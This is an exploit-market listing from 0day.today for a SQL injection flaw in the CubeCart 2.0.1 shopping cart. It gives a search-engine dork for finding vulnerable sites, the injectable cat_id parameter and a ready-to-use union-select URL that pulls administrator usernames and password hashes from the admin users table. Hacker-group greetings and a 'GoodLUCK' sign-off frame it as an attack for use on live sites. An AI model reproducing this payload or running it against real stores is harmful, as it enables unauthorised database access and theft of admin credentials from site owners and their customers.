[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CubeCart 2.0.1 SQL Injection Vulnerability

Author
X_AviaTique_X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14515
Category
web applications
Date add
19-10-2010
Platform
php
==========================================
CubeCart 2.0.1 SQL Injection Vulnerability
==========================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : X_AviaTique_X  fr0m  OS-TEAM
[~] Contact : C99@Live.De
[+] Greats T0: YasMouh , M.K , ArGon HaCKer , Shabah-DZ ,amgad noor
               and all members 0f www.DzHacker.Net
[~] Site: www.DzHaCkEr.NeT
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : CubeCart 2.0.1
~Version : 2.0.1
~Software: http://www.cubecart.com/
~Vulnerability Style : SQL Injection
~Google Keyword : "Powered by CubeCart 2.0.1"
~String : '
[~]Date : "18.10.2010"
[~]Tested on : (L):Unix, (R):5.0.32-Debian
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
   
    ~~~~~~~~ Explotation ~~~~~~~~~~~
    String (') SQL Injection Attack..
    http://www.exemple.com/cart/index.php?cat_id=19' {SQL Injection}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~~ Exemples ~~~~~~~~~~~
    http://www.exemple.com/cart/index.php?cat_id=19+union+select+group_concat%28username,0x3a,password%29,2,3,4,5,6,7,8+from+cube305_CubeCart_admin_users--
    ================================
 
      
     GoodLUCK.



#  0day.today [2024-11-14]  #